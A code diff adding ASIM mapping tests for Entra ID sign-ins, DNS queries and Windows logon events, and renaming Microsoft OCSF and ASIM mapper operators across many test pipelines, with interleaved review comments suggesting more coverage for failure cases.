new file mode 100644
index 0000000..5d5d9b8
--- /dev/null
+++ b/microsoft/tests/asim/graph.txt
@@ -0,0 +1,16 @@
+{
+ name: "asim.authentication",
+ EventSchema: "Authentication",
+ EventSchemaVersion: "0.1.4",
+ EventType: "Logon",
+ EventResult: "Success",
+ EventProduct: "Microsoft Entra ID",
+ EventVendor: "Microsoft",
+ EventOriginalType: "300201",
+ EventOriginalUid: "sign-in-1",
+ Dvc: "Microsoft Entra ID",
+ SrcIpAddr: 203.0.113.10,
+ TargetUsername: "example.com\\alice",
+ TargetUserId: "user-1",
+ TargetAppName: "Office 365",
+}
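Review bot: The expected output pins `TargetUsername: "example.com\\alice"` for an Entra ID sign-in, but the `select` in graph.tql leaves `TargetUsernameType` out, so nothing asserts how that identity is typed. For Entra ID identities the ASIM username type is normally `UPN` (`alice@example.com`), whereas a `domain\user` rendering is the `Windows` form; if the mapper derives the Windows form from the OCSF `user.domain`/`user.name` pair, this test locks in a questionable label instead of catching it. I would add `TargetUsernameType` to the `select` list and confirm the pair is `"alice@example.com"`/`"UPN"`, or document in the test why the Windows form is intended for Graph sign-ins. The `microsoft::asim::map` operator is not in this patch, so the actual derivation is inferred from the expected value only.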
diff --git a/microsoft/tests/asim/ocsf.tql b/microsoft/tests/asim/ocsf.tql
new file mode 100644
index 0000000..c8eb719
--- /dev/null
+++ b/microsoft/tests/asim/ocsf.tql
@@ -0,0 +1,39 @@
+from {
+ activity_id: 1,
+ activity_name: "Query",
+ category_uid: 4,
+ class_uid: 4003,
+ class_name: "DNS Activity",
+ type_uid: 400301,
+ type_name: "DNS Activity: Query",
+ time: 2026-01-01T00:00:02Z,
+ severity_id: 1,
+ status: "Success",
+ rcode: "NA",
+ metadata: {
+ original_event_uid: "dns-1",
+ product: {
+ name: "DNS",
+ vendor_name: "Microsoft",
+ },
+ version: "1.8.0",
+ },
+ device: {
+ hostname: "dns1",
+ },
+ query: {
+ hostname: "example.org",
+ type: "A",
+ class: "IN",
+ },
+ src_endpoint: {
+ ip: 10.0.0.1,
+ },
+}
+microsoft::asim::map
+name = @name
+select name, EventSchema, EventSchemaVersion, EventType,
+ EventSubType, EventResult, EventProduct, EventVendor,
+ EventOriginalType, EventOriginalUid, Dvc, DnsQuery,
+ DnsQueryTypeName, DnsQueryClassName, EventResultDetails,
+ SrcIpAddr
diff --git a/microsoft/tests/asim/ocsf.txt b/microsoft/tests/asim/ocsf.txt
new file mode 100644
index 0000000..7b520b7
--- /dev/null
+++ b/microsoft/tests/asim/ocsf.txt
@@ -0,0 +1,18 @@
+{
+ name: "asim.dns",
+ EventSchema: "Dns",
+ EventSchemaVersion: "0.1.7",
+ EventType: "Query",
+ EventSubType: "request",
+ EventResult: "Success",
+ EventProduct: "DNS",
+ EventVendor: "Microsoft",
+ EventOriginalType: "400301",
+ EventOriginalUid: "dns-1",
+ Dvc: "dns1",
+ DnsQuery: "example.org",
+ DnsQueryTypeName: "A",
+ DnsQueryClassName: "IN",
+ EventResultDetails: "NA",
+ SrcIpAddr: 10.0.0.1,
+}
diff --git a/microsoft/tests/asim/windows.tql b/microsoft/tests/asim/windows.tql
new file mode 100644
index 0000000..a6a7edd
--- /dev/null
+++ b/microsoft/tests/asim/windows.tql
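Review bot: The inline DNS event in ocsf.tql carries `status: "Success"` and `rcode: "NA"` but no `status_id`, and ocsf.txt pins only that success path, so the `EventResult: "Failure"` branch of the new operator is never exercised here and an event that carries only the normative `status_id` enum (2 = Failure) without the `status` label is not covered either. OCSF producers frequently emit `status_id` alone, and failed lookups are the rows DNS detections key on, so a mis-mapped failure branch would pass this suite unnoticed. I would add a second inline event to the `from { ... }` input with `status_id: 2` (no `status`) and a non-`NA` rcode such as `rcode: "NXDomain"`, then assert `EventResult: "Failure"` and `EventResultDetails: "NXDomain"` in the expected output. Whether `microsoft::asim::map` keys on `status` or `status_id` is not visible in this patch; the note assumes at least one of them drives `EventResult`.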
@@ -0,0 +1,10 @@
+from_file f"{env("TENZIR_INPUTS")}/eid-4624.xml" {
+ read_all
+}
+microsoft::asim::map data
+name = @name
+select name, EventSchema, EventSchemaVersion, EventType,
+ EventResult, EventProduct, EventVendor, EventOriginalType,
+ EventOriginalUid, Dvc, DvcHostname, SrcIpAddr=SrcIpAddr?,
+ TargetUsername, TargetUsernameType, TargetUserId, TargetUserIdType,
+ LogonProtocol=LogonProtocol?
diff --git a/microsoft/tests/asim/windows.txt b/microsoft/tests/asim/windows.txt
new file mode 100644
index 0000000..d72b991
--- /dev/null
+++ b/microsoft/tests/asim/windows.txt
@@ -0,0 +1,19 @@
+{
+ name: "asim.authentication",
+ EventSchema: "Authentication",
+ EventSchemaVersion: "0.1.4",
+ EventType: "Logon",
+ EventResult: "Success",
+ EventProduct: "Microsoft-Windows-Security-Auditing",
+ EventVendor: "Microsoft",
+ EventOriginalType: "4624",
+ EventOriginalUid: "98761",
+ Dvc: "DC01.corp.local",
+ DvcHostname: "DC01.corp.local",
+ SrcIpAddr: 10.0.0.42,
+ TargetUsername: "CORP\\jdoe",
+ TargetUsernameType: "Windows",
+ TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1104",
+ TargetUserIdType: "SID",
+ LogonProtocol: "Kerberos",
+}
diff --git a/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql b/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql
index 34f5194..eda2e63 100644
--- a/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql
+++ b/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql
@@ -2,7 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/compliance-policy-setting-state-summari
 read_json
 }
 @name = "microsoft.graph.intune.compliance_policy_setting_state_summary"
-microsoft::graph::ocsf::map
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/graph/ocsf/defender-alerts.tql b/microsoft/tests/graph/ocsf/defender-alerts.tql
index c93dff5..b597953 100644
--- a/microsoft/tests/graph/ocsf/defender-alerts.tql
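Review bot: windows.tql drives the new `microsoft::asim::map data` path with a single successful logon (eid-4624.xml), so `EventResult: "Success"` is the only outcome the Windows-to-ASIM authentication mapping is pinned on. A failed-logon fixture already exists in this tree (eid-4625.xml, referenced by the `microsoft/tests/ocsf/eid-4625.tql` hunk further down), and failed logons are the rows most ASIM authentication detections filter on, so a mis-mapped failure branch would pass this suite unnoticed. I would add a sibling `microsoft/tests/asim/windows-4625.tql` that mirrors this pipeline on `eid-4625.xml` and selects the same columns plus `EventResultDetails=EventResultDetails?`, with an expected file asserting `EventResult: "Failure"`. What the mapper emits for `EventResultDetails` on 4625 is not visible in this patch, so the expected value would need to be taken from a run rather than assumed.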
+++ b/microsoft/tests/graph/ocsf/defender-alerts.tql
@@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/defender-alerts.ndjson" {
 read_json
 }
 @name = "microsoft.graph.defender.alert"
-microsoft::graph::ocsf::map
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/graph/ocsf/defender-incidents.tql b/microsoft/tests/graph/ocsf/defender-incidents.tql
index 7432c6e..d6ff2e3 100644
--- a/microsoft/tests/graph/ocsf/defender-incidents.tql
+++ b/microsoft/tests/graph/ocsf/defender-incidents.tql
@@ -2,7 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/defender-incidents.ndjson" {
 read_json
 }
 @name = "microsoft.graph.defender.incident"
-microsoft::graph::ocsf::map
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
 sort time, metadata.original_event_uid
diff --git a/microsoft/tests/graph/ocsf/detected-apps.tql b/microsoft/tests/graph/ocsf/detected-apps.tql
index 5177c7e..ef02388 100644
--- a/microsoft/tests/graph/ocsf/detected-apps.tql
+++ b/microsoft/tests/graph/ocsf/detected-apps.tql
@@ -2,7 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/detected-apps.ndjson" {
 read_json
 }
 @name = "microsoft.graph.intune.detected_app"
-microsoft::graph::ocsf::map
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/graph/ocsf/directory-audits.tql b/microsoft/tests/graph/ocsf/directory-audits.tql
index 9d30a4e..973eafc 100644
--- a/microsoft/tests/graph/ocsf/directory-audits.tql
+++ b/microsoft/tests/graph/ocsf/directory-audits.tql
@@ -2,7 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/directory-audits.ndjson" {
 read_json
 }
 @name = "microsoft.graph.directory_audit"
-microsoft::graph::ocsf::map
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
 sort time
diff --git a/microsoft/tests/graph/ocsf/managed-devices.tql b/microsoft/tests/graph/ocsf/managed-devices.tql
index 394bdd5..1524afe 100644
--- a/microsoft/tests/graph/ocsf/managed-devices.tql
+++ b/microsoft/tests/graph/ocsf/managed-devices.tql
@@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/managed-devices.ndjson" {
 read_json
 }
 @name = "microsoft.graph.intune.managed_device"
-microsoft::graph::ocsf::map
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/graph/ocsf/risk-detections.tql b/microsoft/tests/graph/ocsf/risk-detections.tql
index f41f158..5fc5d4e 100644
--- a/microsoft/tests/graph/ocsf/risk-detections.tql
+++ b/microsoft/tests/graph/ocsf/risk-detections.tql
@@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/risk-detections.ndjson" {
 read_json
 }
 @name = "microsoft.graph.identity_protection.risk_detection"
-microsoft::graph::ocsf::map
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/graph/ocsf/risky-users.tql b/microsoft/tests/graph/ocsf/risky-users.tql
index c0247cd..8d9ac02 100644
--- a/microsoft/tests/graph/ocsf/risky-users.tql
+++ b/microsoft/tests/graph/ocsf/risky-users.tql
@@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/risky-users.ndjson" {
 read_json
 }
 @name = "microsoft.graph.identity_protection.risky_user"
-microsoft::graph::ocsf::map
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/graph/ocsf/sign-ins.tql b/microsoft/tests/graph/ocsf/sign-ins.tql
index 99401ba..2c86d79 100644
--- a/microsoft/tests/graph/ocsf/sign-ins.tql
+++ b/microsoft/tests/graph/ocsf/sign-ins.tql
@@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" {
 read_json
 }
 @name = "microsoft.graph.sign_in"
-microsoft::graph::ocsf::map
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf-to-asim/alert.tql b/microsoft/tests/ocsf-to-asim/alert.tql
index 5a96c99..cb1927d 100644
--- a/microsoft/tests/ocsf-to-asim/alert.tql
+++ b/microsoft/tests/ocsf-to-asim/alert.tql
@@ -51,7 +51,7 @@ from {
 ],
 }
 @name = "ocsf.detection_finding"
-microsoft::ocsf::map_to_asim
+microsoft::asim::ocsf::map
 name = @name
 select name, EventSchema, EventSchemaVersion, EventType, EventUid, EventSeverity, EventOriginalUid, EventProduct, EventVendor, AlertName,
diff --git a/microsoft/tests/ocsf-to-asim/audit.tql b/microsoft/tests/ocsf-to-asim/audit.tql
index d1e4325..56aad19 100644
--- a/microsoft/tests/ocsf-to-asim/audit.tql
+++ b/microsoft/tests/ocsf-to-asim/audit.tql
@@ -39,7 +39,7 @@ from {
 },
 }
 @name = "ocsf.event_log_activity"
-microsoft::ocsf::map_to_asim
+microsoft::asim::ocsf::map
 name = @name
 select name, EventSchema, EventSchemaVersion, EventType, EventResult, EventSeverity, EventOriginalType, Dvc, DvcHostname, Object, ObjectType,
diff --git a/microsoft/tests/ocsf-to-asim/authentication.tql b/microsoft/tests/ocsf-to-asim/authentication.tql
index 2e0d03b..91d38ad 100644
--- a/microsoft/tests/ocsf-to-asim/authentication.tql
+++ b/microsoft/tests/ocsf-to-asim/authentication.tql
@@ -143,7 +143,7 @@ from {
 },
 }
 @name = "ocsf.authentication"
-microsoft::ocsf::map_to_asim
+microsoft::asim::ocsf::map
 name = @name
 sort EventOriginalUid
 select name, EventSchema, EventSchemaVersion, EventType,
diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.tql b/microsoft/tests/ocsf-to-asim/direct-targets.tql
index 21ca2fa..6d4e3b4 100644
--- a/microsoft/tests/ocsf-to-asim/direct-targets.tql
+++ b/microsoft/tests/ocsf-to-asim/direct-targets.tql
@@ -182,7 +182,7 @@ from {
 code: 200,
 },
 }
-microsoft::ocsf::map_to_asim
+microsoft::asim::ocsf::map
 name = @name
 sort EventOriginalUid
 select name, EventSchema, EventSchemaVersion, EventType, EventResult,
diff --git a/microsoft/tests/ocsf-to-asim/process.tql b/microsoft/tests/ocsf-to-asim/process.tql
index db7a522..caa54b3 100644
--- a/microsoft/tests/ocsf-to-asim/process.tql
+++ b/microsoft/tests/ocsf-to-asim/process.tql
@@ -55,7 +55,7 @@ from {
 },
 }
 @name = "ocsf.process_activity"
-microsoft::ocsf::map_to_asim
+microsoft::asim::ocsf::map
 name = @name
 select name, EventSchema, EventSchemaVersion, EventType, EventResult, EventSeverity, EventOriginalType, DvcHostname, ActorUsername,
diff --git a/microsoft/tests/ocsf-to-asim/unsupported-strict.tql b/microsoft/tests/ocsf-to-asim/unsupported-strict.tql
index 1016c0b..391f957 100644
--- a/microsoft/tests/ocsf-to-asim/unsupported-strict.tql
+++ b/microsoft/tests/ocsf-to-asim/unsupported-strict.tql
@@ -26,5 +26,5 @@ from {
 }
 @name = "ocsf.script_activity"
 strict {
- microsoft::ocsf::map_to_asim
+ microsoft::asim::ocsf::map
 }
diff --git a/microsoft/tests/ocsf-to-asim/user-management.tql b/microsoft/tests/ocsf-to-asim/user-management.tql
index a46548e..037eb44 100644
--- a/microsoft/tests/ocsf-to-asim/user-management.tql
+++ b/microsoft/tests/ocsf-to-asim/user-management.tql
@@ -76,7 +76,7 @@ from {
 },
 }
 @name = "ocsf.account_change"
-microsoft::ocsf::map_to_asim
+microsoft::asim::ocsf::map
 name = @name
 sort EventOriginalType
 select name, EventSchema, EventSchemaVersion, EventType, EventResult,
diff --git a/microsoft/tests/ocsf/eid-0100.tql b/microsoft/tests/ocsf/eid-0100.tql
index db1d984..28242cd 100644
--- a/microsoft/tests/ocsf/eid-0100.tql
+++ b/microsoft/tests/ocsf/eid-0100.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-0100.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-0101.tql b/microsoft/tests/ocsf/eid-0101.tql
index e9deb9a..3371198 100644
--- a/microsoft/tests/ocsf/eid-0101.tql
+++ b/microsoft/tests/ocsf/eid-0101.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-0101.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-0102.tql b/microsoft/tests/ocsf/eid-0102.tql
index d61c1da..a18d7c4 100644
--- a/microsoft/tests/ocsf/eid-0102.tql
+++ b/microsoft/tests/ocsf/eid-0102.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-0102.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-0106.tql b/microsoft/tests/ocsf/eid-0106.tql
index 0482e94..bc298a6 100644
--- a/microsoft/tests/ocsf/eid-0106.tql
+++ b/microsoft/tests/ocsf/eid-0106.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-0106.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-0129.tql b/microsoft/tests/ocsf/eid-0129.tql
index d75ee9e..157c549 100644
--- a/microsoft/tests/ocsf/eid-0129.tql
+++ b/microsoft/tests/ocsf/eid-0129.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-0129.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-0140.tql b/microsoft/tests/ocsf/eid-0140.tql
index 6b33d23..f0f8c55 100644
--- a/microsoft/tests/ocsf/eid-0140.tql
+++ b/microsoft/tests/ocsf/eid-0140.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-0140.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-0141.tql b/microsoft/tests/ocsf/eid-0141.tql
index 35ec463..cc0c3f0 100644
--- a/microsoft/tests/ocsf/eid-0141.tql
+++ b/microsoft/tests/ocsf/eid-0141.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-0141.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-0200.tql b/microsoft/tests/ocsf/eid-0200.tql
index 84f2ea8..b005263 100644
--- a/microsoft/tests/ocsf/eid-0200.tql
+++ b/microsoft/tests/ocsf/eid-0200.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-0200.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-0201.tql b/microsoft/tests/ocsf/eid-0201.tql
index ecd335d..607df7f 100644
--- a/microsoft/tests/ocsf/eid-0201.tql
+++ b/microsoft/tests/ocsf/eid-0201.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-0201.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-1000.tql b/microsoft/tests/ocsf/eid-1000.tql
index 25270e4..7a91880 100644
--- a/microsoft/tests/ocsf/eid-1000.tql
+++ b/microsoft/tests/ocsf/eid-1000.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-1000.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-1001.tql b/microsoft/tests/ocsf/eid-1001.tql
index b6fa6b0..de919fc 100644
--- a/microsoft/tests/ocsf/eid-1001.tql
+++ b/microsoft/tests/ocsf/eid-1001.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-1001.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-1002.tql b/microsoft/tests/ocsf/eid-1002.tql
index 32eba09..8930325 100644
--- a/microsoft/tests/ocsf/eid-1002.tql
+++ b/microsoft/tests/ocsf/eid-1002.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-1002.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-1006.tql b/microsoft/tests/ocsf/eid-1006.tql
index d6c0e24..cd39dbf 100644
--- a/microsoft/tests/ocsf/eid-1006.tql
+++ b/microsoft/tests/ocsf/eid-1006.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-1006.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-1007.tql b/microsoft/tests/ocsf/eid-1007.tql
index bcd2818..429cf01 100644
--- a/microsoft/tests/ocsf/eid-1007.tql
+++ b/microsoft/tests/ocsf/eid-1007.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-1007.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-1102.tql b/microsoft/tests/ocsf/eid-1102.tql
index 35971f9..5bf1783 100644
--- a/microsoft/tests/ocsf/eid-1102.tql
+++ b/microsoft/tests/ocsf/eid-1102.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-1102.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-1116.tql b/microsoft/tests/ocsf/eid-1116.tql
index d26d3a9..c4657ce 100644
--- a/microsoft/tests/ocsf/eid-1116.tql
+++ b/microsoft/tests/ocsf/eid-1116.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-1116.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-1117.tql b/microsoft/tests/ocsf/eid-1117.tql
index 763191a..2c6ea04 100644
--- a/microsoft/tests/ocsf/eid-1117.tql
+++ b/microsoft/tests/ocsf/eid-1117.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-1117.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-1121.tql b/microsoft/tests/ocsf/eid-1121.tql
index 93b83a8..a9cd4eb 100644
--- a/microsoft/tests/ocsf/eid-1121.tql
+++ b/microsoft/tests/ocsf/eid-1121.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-1121.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-2000.tql b/microsoft/tests/ocsf/eid-2000.tql
index a2ea9df..a6944b1 100644
--- a/microsoft/tests/ocsf/eid-2000.tql
+++ b/microsoft/tests/ocsf/eid-2000.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-2000.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4100.tql b/microsoft/tests/ocsf/eid-4100.tql
index 061275e..44a701f 100644
--- a/microsoft/tests/ocsf/eid-4100.tql
+++ b/microsoft/tests/ocsf/eid-4100.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4100.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4103.tql b/microsoft/tests/ocsf/eid-4103.tql
index 7de51dc..ab4cf96 100644
--- a/microsoft/tests/ocsf/eid-4103.tql
+++ b/microsoft/tests/ocsf/eid-4103.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4103.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4104.tql b/microsoft/tests/ocsf/eid-4104.tql
index 3f1dbcb..e95bc7d 100644
--- a/microsoft/tests/ocsf/eid-4104.tql
+++ b/microsoft/tests/ocsf/eid-4104.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4104.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4105.tql b/microsoft/tests/ocsf/eid-4105.tql
index 40c361e..e7ed9d1 100644
--- a/microsoft/tests/ocsf/eid-4105.tql
+++ b/microsoft/tests/ocsf/eid-4105.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4105.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4106.tql b/microsoft/tests/ocsf/eid-4106.tql
index 66c6d0e..0278912 100644
--- a/microsoft/tests/ocsf/eid-4106.tql
+++ b/microsoft/tests/ocsf/eid-4106.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4106.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4624.tql b/microsoft/tests/ocsf/eid-4624.tql
index c78fea6..1f5407a 100644
--- a/microsoft/tests/ocsf/eid-4624.tql
+++ b/microsoft/tests/ocsf/eid-4624.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4624.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4625.tql b/microsoft/tests/ocsf/eid-4625.tql
index 13870fe..9d08d78 100644
--- a/microsoft/tests/ocsf/eid-4625.tql
+++ b/microsoft/tests/ocsf/eid-4625.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4625.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4648.tql b/microsoft/tests/ocsf/eid-4648.tql
index 99d13fb..e9ad6ca 100644
--- a/microsoft/tests/ocsf/eid-4648.tql
+++ b/microsoft/tests/ocsf/eid-4648.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4648.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4672.tql b/microsoft/tests/ocsf/eid-4672.tql
index 7a4cdc0..19c7581 100644
--- a/microsoft/tests/ocsf/eid-4672.tql
+++ b/microsoft/tests/ocsf/eid-4672.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4672.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4688.tql b/microsoft/tests/ocsf/eid-4688.tql
index 636ffac..38bc3e2 100644
--- a/microsoft/tests/ocsf/eid-4688.tql
+++ b/microsoft/tests/ocsf/eid-4688.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4688.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4697.tql b/microsoft/tests/ocsf/eid-4697.tql
index d34a34c..c110c07 100644
--- a/microsoft/tests/ocsf/eid-4697.tql
+++ b/microsoft/tests/ocsf/eid-4697.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4697.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4698.tql b/microsoft/tests/ocsf/eid-4698.tql
index db26c7f..1e4cf62 100644
--- a/microsoft/tests/ocsf/eid-4698.tql
+++ b/microsoft/tests/ocsf/eid-4698.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4698.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4720.tql b/microsoft/tests/ocsf/eid-4720.tql
index 62badee..236a9d4 100644
--- a/microsoft/tests/ocsf/eid-4720.tql
+++ b/microsoft/tests/ocsf/eid-4720.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4720.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4722.tql b/microsoft/tests/ocsf/eid-4722.tql
index 575469c..e827a02 100644
--- a/microsoft/tests/ocsf/eid-4722.tql
+++ b/microsoft/tests/ocsf/eid-4722.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4722.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4725.tql b/microsoft/tests/ocsf/eid-4725.tql
index 8a88ccf..11b0dcf 100644
--- a/microsoft/tests/ocsf/eid-4725.tql
+++ b/microsoft/tests/ocsf/eid-4725.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4725.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
